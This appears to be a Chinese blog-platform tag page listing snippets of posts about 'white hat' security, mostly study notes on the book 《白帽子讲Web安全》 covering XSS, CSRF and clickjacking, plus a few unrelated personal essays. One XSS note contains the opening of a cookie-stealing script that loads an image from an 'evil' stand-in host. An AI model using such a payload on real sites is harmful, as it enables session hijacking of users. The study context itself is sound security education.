白帽子

web安全[网易白帽子课程笔记+体会]-02web安全基础

web安全-02web安全基础一、无处不在的安全问题1、钓鱼phishing2、篡改网页tampering3、暗链hiddenhyperlinks4、webshell二、常见Web漏洞解析常见web漏洞分类1、XSS1.1、什么是XSS1.2、存储型XSS1.3、反射型XSS1.4、DOM型XSS1.5、三种XSS对比2、CSRF2.1什么是CSRF2.2CSRF原理2.3CSRF示例3、点击劫持
双玉山人·2020-08-08 00:13

web 安全学习笔记

正好看到《白帽子讲web安全》一书,内容很不错。这里开始做一些零碎的笔记。引言里讲到了php的一些漏洞。如0字节截断漏洞,ngnix文件解析漏洞。但是没有展开讲。
sailtoyouSCU·2020-08-08 00:57

[读书笔记]《白帽子讲WEB安全》

这本书一直没时间去看,虽然有电子书但是还是喜欢纸质书本的气息,道哥作品,这本书真的是一本非常经典且非常有深度的一本安全类书籍,给予了我很大的帮助,本篇文章记录一下书中所讲不熟悉之处。安全工程师的核心竞争力不在于他能拥有多少个0day,掌握多少种安全技术,而是在于他对安全理解的深度,以及由此引申的看待安全问题的角度和高度。0x01世界观安全安全三要素机密性、完整性、可用性安全评估过程资产等级划分、威
dyboy2017·2020-08-07 23:10

白帽子讲WEB安全》学习笔记之第5章 点击劫持(clickjacking)

第5章点击劫持(clickjacking)5.1什么是点击劫持点击劫持是一种视觉上的欺骗手段。是一种在网页中将恶意代码等隐藏在看似无害的内容(如按钮)之下,并诱使用户点击的手段。主要特征q点击劫持是一种恶意***技术,用于跟踪网络用户,获取其私密信息或者通过让用户点击看似正常的网页来远程控制其电脑。很多浏览器和操作平台都有这样的漏洞。q点击劫持技术可以用嵌入代码或者文本的形式出现,在用户毫不知情的
weixin_34185560·2020-08-07 23:14

白帽子讲Web安全》| 学习笔记之点击劫持(ClickJacking)

第5章点击劫持(ClickJacking)1、点击劫持点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上。2、图片覆盖攻击点击劫持的本质是一种视觉欺骗。顺着这个思路,还有一些攻击方法
大青呐·2020-08-07 23:32

推荐信息安全书籍27本(含电子书)

【技术类——白帽子入门必看17本】Android软件安全与逆向分析Android安全攻防权威指南白帽子讲web安全恶意代码分析实
anquanniu牛油果·2020-08-07 12:00

白帽子讲web扫描 读书笔记

白帽子讲web扫描读书笔记漏洞感知漏洞分析漏洞响应漏洞沉淀纵深防御建立企业专属有效的扫描体系第一章扫描器基础每个web漏洞都有自己的常见签名特征,可以通过对web应用发起http(s)请求的方式,通过其响应结果进行判断
炒鸡辣鸡复读机·2020-08-05 21:10

白帽子讲web安全(XSS)学习笔记

XSS攻击是什么通常指黑客通过“HTML注入”篡改网页、插入恶意脚本,从而在用户浏览页面是控制用户浏览器的一种攻击。XSS攻击类型反射型XSS:需要用户“点击”一个恶意链接,把用户输入的数据“反射”给浏览器,才能攻击成功。也叫做“非持久型XSS”(Non-persistentXSS)存储型XSS:会把用户输入的数据”存储“在服务器端,有很强的稳定性,也叫做”持久型XSS“(PersistentXS
weixin_42811970·2020-08-05 20:05

白帽子讲web安全笔记——XSS(一)

XSS跨站脚本攻击三种类型:1.反射型:简单的把用户输入的数据“反射”给浏览器2.存储型:把用户输入的数据“存储”在服务器端具有很强的稳定性3.DOMBased:修改页面的DOM节点形成的XSS攻击:Cookie劫持先加载一个远程脚本在evil.js中,通过代码窃取Cookievarimg=document.createElement("img");img.src="http://www.evil
奶茶里的红豆·2020-08-05 20:08

白帽子讲WEB安全》学习笔记之第16章 互联网业务安全

第16章互联网业务安全16.1产品需要什么样的安全安全是一个独立的,应该与业务持平。16.1.1互联网产品对安全的需求安全性是产品特性的一个组成部分,具备了安全性,产品才是完整的;安全做好了,产品才是最终正真的成熟。16.1.2什么是好的安全方案我认为好的方案是:q人性化q智能化q性价比高再次强调,安全是产品的一种特性,如果产品能够潜移默化地培养用户的安全习惯,将用户往更安全的行为上引导。那么这就
weixin_33819479·2020-08-05 20:17

白帽子讲WEB安全》学习笔记之第3章 跨站脚本***(xss)

第3章跨站脚本***(xss)3.1xss简介恶意***者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS***:跨站脚本***(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆。故将跨站脚本***缩写为XSS。XSS本质就是HTML注入XSS的
weixin_33785108·2020-08-05 20:15

白帽子讲WEB安全》学习笔记之第3章 跨站脚本攻击(xss)

第3章跨站脚本攻击(xss)3.1xss简介恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS攻击:跨站脚本攻击(CrossSiteScripting),为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS本质就是HTML注入XSS的分类:(1
weixin_33736649·2020-08-05 20:12

白帽子讲Web安全》- 学习笔记

一、为何要了解Web安全最近加入新公司后,公司的官网突然被Google标记为了不安全的诈骗网站,一时间我们信息技术部门成为了众矢之的,虽然老官网并不是我们开发的(因为开发老官网的前辈们全都跑路了)。我们花了很多时间做Web安全扫描以及修复,在检查和修复过程中,发现老系统的代码的不可维护性(再次说明整洁代码之道CleanCode的重要性)及安全性(同时也说明了Web安全的重要性)。修复之后,向Goo
weixin_33682790·2020-08-05 20:11

白帽子讲web安全》学习笔记(3)

第3章跨站脚本攻击(XSS)1、跨站脚本攻击(CrossSiteScript),通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,在用户浏览网页时,控制用户浏览器。属于客户端攻击,受害者最终是用户。恶意代码一般使用javascript编写。存在XSS漏洞的网站,可以盗取用户Cookie、黑掉页面、导航到恶意网站,网站挂马、XSS蠕虫。2、XSS类型。(1)反射型XSS(也叫做非持久型XS
无敌飓风小胖纸·2020-08-05 20:37

白帽子讲Web安全》| 学习笔记之Web框架安全

第12章Web框架安全1、MVC框架安全MVC是Model-View-Controller的缩写。它将web应用分为三层,View层负责用户视图、页面展示等工作,Controller负责应用的逻辑实现,接收View层传入的用户请求,并转发给对应的Model做处理;Model层则负责实现模型,完成数据的处理。在Spring框架中可以使用springsecurity来增加系统的安全性。2、模板引擎与X
大青呐·2020-08-05 19:34

白帽子讲Web安全》| 学习笔记之HTML5安全

第6章HTML5安全1、新标签的XSSHTML5中新增的一些标签和属性,使得XSS等Web攻击产生了新的变化。有安全研究员建立了一个HTML5SecurityCheatsheet项目。(链接:https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet或http://html5sec.org/)2、iframe的sandbox在HTML5中,
大青呐·2020-08-05 19:34

白帽子讲Web安全》| 学习笔记之客户端脚本安全

第二章浏览器安全1、同源策略(SameOriginPolicy),是一种约定,它是浏览器最核心也是最基本的安全功能。浏览器的同源策略,限制了来自不同源的“document"或脚本,对当前”document"读取或设置某些属性。影响“源”的因素有:host(域名或IP地址,如果是IP地址则看作一个根域名)、子域名、端口、协议。对于当前页面来说,页面内存放的javascript文件的域并不重要,重要的
大青呐·2020-08-05 19:03

白帽子讲Web安全》| 学习笔记之跨站脚本攻击(XSS)

第3章跨站脚本攻击(XSS)1、XSS跨站脚本攻击,英文全称是CrossSiteScript,本来缩写是CSS,但是为了和层叠样式表分开,所以在安全领域叫做'XSS'。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。XSS根据效果的不同可以分成如下几类:反射型XSS,只是简单地把用户输入的数据“反射”给浏览器。也就是说,黑客往
大青呐·2020-08-05 19:03

超详细安全圈微信公众号,速度马!

安全技术长亭科技安恒信息安全研究院奇安信ATEAM深信服千里目安全实验室天融信阿尔法实验室酒仙桥六号部队看雪学院T00lsFreeBufBypass吾爱破解论坛Secquan圈子社区i春秋赛宁网安白帽学院白帽子社区国科漏斗社区云众可信黑白之道星盟安全红日安全乌云安全渗透云笔记信安之路中国白客联盟渗透测试教程悬剑武器库行长叠报
FFFIONA__·2020-08-05 19:40

白帽子讲web安全】第一章 我的安全世界观(读书笔记)

web安全简史中国黑客简史启蒙时代:中国互联网刚起步,不受利益驱使,分享自己的研究成果黄金时代:中美黑客大战,更多年轻人加入到黑客组织中,同时以盈利为目的的攻击开始黑暗时代:黑客精神(open\share\free)死亡,部分黑客步入黑色产业黑客技术的发展历程攻击系统软件:web技术还不成熟;攻击系统软件可以拿到root权限。eg:TESO写过一个攻击SSH的exploit入侵美国中情局随着防火墙
该学习了啊·2020-08-05 18:33

白帽子讲Web安全(对看书之后的一点笔记)

第一章.世界观安全1.网络安全最先研究计算机系统和网络安全的人称之为“Hacker”,人们习惯于称他们为黑客。字面意思的理解就是专门破坏规则,寻找一些系统漏洞,以获得某些权力。对于现在计算机最高的权限是“root”.漏洞能够帮助黑客利用代码拿到他们想得到的东西。黑客使用的漏洞代码是“exploit”.2.黑客的发展起初黑客攻击系统软件的居多,能够获取到“root”权限,(著名的黑客组织TESO)早
Serendipity_筱楠·2020-08-05 18:01

白帽子讲Web安全学习笔记之客户端脚本安全

#白帽子讲Web安全学习笔记之客户端脚本安全浏览器安全    主要的浏览器的安全功能如下:###1、同源策略    同源策略是一种约定,它是浏览器最核心也是最基本的安全功能,若缺少了则浏览器的正常功能可能都会受到影响
钝之·2020-08-05 18:18

白帽子讲Web安全》学习笔记01 XSS

白帽子讲Web安全》学习笔记01XSSDOMBasedXSS通过修改页面的DOM节点形成的XSSXSSpayload窃取cookie构造GET和POST请求GETDOMBasedXSS通过修改页面的DOM
WustHandy·2020-08-05 17:59

白帽子讲Web安全(第 3 章 跨站脚本攻击( XSS ))

第3章跨站脚本攻击(XSS)3.1XSS简介跨站脚本攻击,英文全称是CrossSiteScript,本来缩写是CSS,但是为了和层叠样式表(CascadingStyleSheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“跨站
sports-boy·2020-08-05 09:12

黑客入门知识分享

萌新博主有幸阅读了《白帽子讲Web安全》前辈的著作,深受启发,在此引用前辈的语句,作为文章的开篇,成为黑客的第一步,开始阅读吧!安全问题的本质是信任的问题。
Serendipper_constan·2020-08-04 07:19

“黑客”深度学习之“游戏外挂原理实现”之美

我回答“我是一个白帽子黑客”。“那能不能帮我攻入游戏系统做一款游戏外挂,咱们一起赚钱?”我就只能呵呵了,肯定是不可以的,技术上虽然可以实现但是原则上一定不要那么做。
梦小娴·2020-08-03 12:30

还在为参数校验发愁?spring-validation最佳实践指南

最近线上接口受到白帽子攻击,由于后端接口没有严格地进行参数校验,从而导致了系统程序异常和线上脏数据的问题。为了项目中参数校验方式的统一,因此在项目中引入了spring-validation。
6点半起床·2020-08-03 10:15

从补天白帽大会看网络世界那些“挖洞”的人

不过还有一个与之相近的词同样脱胎于网络世界——“挖洞”,它的背后同样围绕了一个群体——“白帽子”。
三朵小红花·2020-08-03 01:33

7天收到312个漏洞,涉及175个项目方,DVP开启区块链漏洞围剿计划

月1日,由区块链安全公司BCSEC与PeckShield共同发起——去中心化漏洞平台DVP(https://det.io/)召开“安全链接计划”发布会,于7月24日正式上线的DVP平台,上线首周已收到白帽子所提供的
FLy_鹏程万里·2020-08-02 21:21

白帽子Web安全小白成长记2

白帽子Web安全小白成长记2第二课WEB安全基础1.XSS(CrossSiteScript)跨站脚本攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行
BZet·2020-08-01 12:01

Agan Web安全与内网学习,记录成长为白帽子的艰辛过程【Flag】

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01Web安全基础计算机网络基础系列MySQL基础系列Windwos基础系列Linux基础系列Python基础系列黑客练习小游戏系列HTML5系列0x02Web安全基础技能学习系列SQL注入入门~~~~~~进阶SqlMap基础使用SQL注入靶场练习文件上传文件包含命令执行常见Web漏洞Struts2漏洞PHP序列化Xss中间件漏洞其它Web
Agan '·2020-07-31 13:34

web安全——ClickJacking

多数来自《白帽子讲web安全》一书,对于里面的思考,博客中以红色字体标出。注:博客中一些示图源自《白帽子讲web安全》一书。
Venscor·2020-07-31 10:46

白帽子讲web安全》读书笔记系列14:点击劫持与HTML5安全

1、各种点击劫持点击劫持:一种视觉上的欺骗手段,使用一个透明的、不可见的iframe,覆盖在网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击透明的iframe页面。Flash点击劫持:攻击者制作一个flash游戏,诱使用户来玩这个游戏,通过诱导用户多次点击,以完成一些较为复杂的流程。图片覆盖攻击:通过调整图片的style使得图片覆盖在他所指定的任意位置,以覆盖某些特殊内容,达到
川中胡子·2020-07-31 09:15

白帽子讲Web安全》5-点击劫持(ClickJacking)

第5章点击劫持(ClickJacking)5.1什么是点击劫持点击劫持是一种视觉上的欺骗。攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,通过调整iframe的位置,诱使用户恰好点击在iframe页面的一些功能性按钮上。点击劫持与CSRF有异曲同工之妙,都是在用户不知情的情况下诱使用户完成一些动作。5.2Flash点击劫持攻击者通过Flash构造出了点击劫持,在完成一系列复杂的动作后
ch_fu·2020-07-30 23:32

第四章:爷爷

全村人都穿着白衣服白帽子,从上往下看像是一朵朵白云,汇成了一片带着沉痛哭声的白云。洛洛在葬礼上看见了李玉婷老师,就和大黑跑过去,
Smile失约·2020-07-30 19:25

还在为参数校验发愁?spring-validation最佳实践指南

最近线上接口受到白帽子攻击,由于后端接口没有严格地进行参数校验,从而导致了系统程序异常和线上脏数据的问题。
六点半起床·2020-07-30 17:30

XSS大法

书本:《白帽子将web安全》大佬博客:https://www.cnblogs.com/leestar54/p/5798937.html#wiz_toc_7这位大佬把白帽上的知识总结了一下,没有书的朋友可以直接看首先
保持O童心·2020-07-30 15:19

第四更《这个美女不太冷》

然后她:哈哈哈哈哈哈哈2.今天我穿的白色t恤和牛仔裙,然后戴了丫的白帽子,走着走着,丫来了一句:我帽子挺配你的衣服的,青春活力style!我说:我本身就是这个style好不好!!
天涯海角都随你去·2020-07-30 01:34

Kali(渗透工具):18---WPScan的使用(WordPress扫描工具)

Wordpress作为三大建站模板之一,在全世界范围内有大量的用户,这也导致白帽子都会去跟踪WordPress的安全漏洞,Wordpress自诞生起也出现了很多漏洞。
江南、董少·2020-07-29 11:22

扫墓小记

记得母亲离开的当天,我在姐家把母亲带到阳台上为她洗脸,洗脚、剪指甲后和母亲再见,在下楼后我又和她道别时,她头上戴的白帽子晃动着说道:你几时再过来,我说在家的这段时间会多过来的。
本好·2020-07-29 10:24

美丽时刻

星期五我放学走出学校门口,一眼就在密密麻麻的人群中看见了我父亲,他头上落了一层雪,好似一顶白帽子,他手里提了两个大袋子,用左手提着,向我挥着右手,用惯了在家里叫我“娃子”,他也在人群中大声喊:“娃子,这
靖宇轩逸·2020-07-29 00:20

中国白帽黑客群像:90后占60%以上

发现这些安全漏洞的,并不是某个人或者某个公司,而是一个被称为“白帽子”的群体。白帽子属于黑客,但是又在做着守护光明的事情,他们是网络世界白与黑的交集。他们都是些什么样的人?
wesay1·2020-07-28 23:13

一文读懂 Web 安全

Web安全是互联网中不可或缺的一个领域,这个领域中诞生了大量的黑帽子与白帽子,他们都是安全领域的王者,在平时里,他们利用各种巧妙的技术互相博弈,时不时就会掀起一场Web安全浪潮,真可谓神仙打架,各显神通
lmjben·2020-07-28 18:09

从Java的角度修复CSRF漏洞

很多时候你很熟悉一种安全漏洞,但是涉及到的修复方案你只能大概讲下,具体到代码层你就束手无策了,这不是个优秀的白帽子行为。CSRF一般有两种修复方案1.加随机性token
weixin_30463341·2020-07-28 16:47

The Art, Science, and Engineering of Fuzzing: A Survey

许多“白帽子”使用模糊测试技术在“黑帽子”之前发现漏洞,以进行安全防御。各大公司在实际的项目开发中,也经常使用模糊测试技术检测产品的安全性。
CR-Box·2020-07-28 06:08

白帽子讲web安全》读书笔记

web用户少,且攻击它只能获得较低权限防火墙,ACL(访问控制列表)的兴起,给暴露的系统施加了屏障使得暴露在外的非web程序越来越少+web的兴起=web攻击变多web1.0:服务器端动态脚本的安全问题白帽子讲究防守
我家面试官最好看·2020-07-28 05:56

白帽子讲Web安全》4-跨站点请求伪造(CSRF)

第4章跨站点请求伪造(CSRF)CrossSiteRequestForgery4.1CSRF简介举例,攻击者仅仅诱使用户访问了一个页面,就以该用户的身份在第三方站点里执行了一次操作(删除了搜狐博客上的一篇文章)。4.2CSRF进阶4.2.1浏览器的Cookie策略浏览器所持有的Cookie分为两种:SessionCookie,又称“临时Cookie”没有指定Expire时间,浏览器关闭后,Sees
ch_fu·2020-07-27 20:28

白帽子众测平台hackone推介的100种网络安全工具和资源

了解下现在老外都在用什么。英语好的大佬也可以读读原文1文章目录BurpSuite相关Web安全移动安全漏洞利用扫描器/漏洞利用集成框架数据集合/免费服务其他黑客工具ReferenceBurpSuite相关BurpSuite:典型的Web应用程序黑客工具。一旦在HackerOne上获得500点声誉,您就有资格获得BurpSuitePro的3个月免费许可证!看看这些很棒的Burp插件:ActiveSc
尸者狗·2020-07-27 14:01

白帽子讲web安全】关于XSS,CSRF,SQL注入

1.XSS分类:1.反射型:给用户发送页面或者链接,让用户点击来进行攻击2.存储型:把攻击存放在服务端,可能造成传播(比如博客系统,每个访问该页面的人都有可能被攻击),主动性更强3.DOM型:本质上是反射型,但是是通过用户点击,修改原本dom元素的属性,构造攻击动作反射型和dom型区别:反射型是构造好了攻击动作,然后就等你打开那个页面;dom型也是等你点击,但是不是页面,通过用户动作,把原来的动作
natsuyu·2020-07-27 12:15

SQL注入知识总结v1.0

我们要做遵纪守法,维护国家网络安全的白帽子~而不是搞黑产的黑客~~好啦,言归正
Monsterlz123·2020-07-15 18:35
上一页 7 8 9 10 11 12 13 14 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他